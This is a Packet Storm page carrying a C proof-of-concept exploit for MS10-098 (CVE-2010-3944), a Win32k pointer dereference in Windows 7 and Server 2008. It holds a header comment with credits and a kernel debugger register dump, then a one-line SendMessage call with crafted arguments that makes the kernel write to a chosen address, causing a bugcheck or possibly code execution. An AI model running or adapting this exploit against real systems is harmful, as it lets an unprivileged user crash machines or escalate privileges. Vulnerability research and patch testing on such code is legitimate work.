Microsoft Windows Win32k pointer dereference proof of concept exploit that leverages the vulnerability noted in MS10-098.
88c0d56f4f9ce474815203874c072f79800b80461abd432eb2320a32dcce001a/*************************************************************************************
* MS10-098
* CVE-2010-3944
*
* Microsoft Windows Win32k pointer dereferencement
*
* --------------------
* Affected Software
* ------------------------
* Microsoft Windows 7 / 2008
*
*
* --------------------
* Consequences
* -----------------------
* An unprivileged user may be able to cause a bugcheck, or possibly execute
* arbitrary code by CSRSS.EXE.
*
*
*
* Credits : Stefan LE BERRE (s.leberre@sysdream.com)
* Ludo t0ka7a
*
* WebSites : http://www.sysdream.com/
* http://ghostsinthestack.org/
* http://infond.blogspot.com/
* http://twitter.com/hackinparis
*
* kd> r
* eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618 edi=fea00618
* eip=8d72af90 esp=95b54a98 ebp=95b54b00 iopl=0 nv up ei ng nz na pe nc
* cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286
* win32k!xxxRealDefWindowProc+0xf6:
* 8d72af90 c60000 mov byte ptr [eax],0 ds:0023:00013370=??
*
*************************************************************************************/
#include <stdio.h>
#include <windows.h>
#include <Winuser.h>
int main(int argc, char *argv[])
{
SendMessage((HWND) 16,(UINT) 13,0x80000000,0x00013370); // 0x13370 is the deref and 16 is the window handle of #32769
return 0;
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed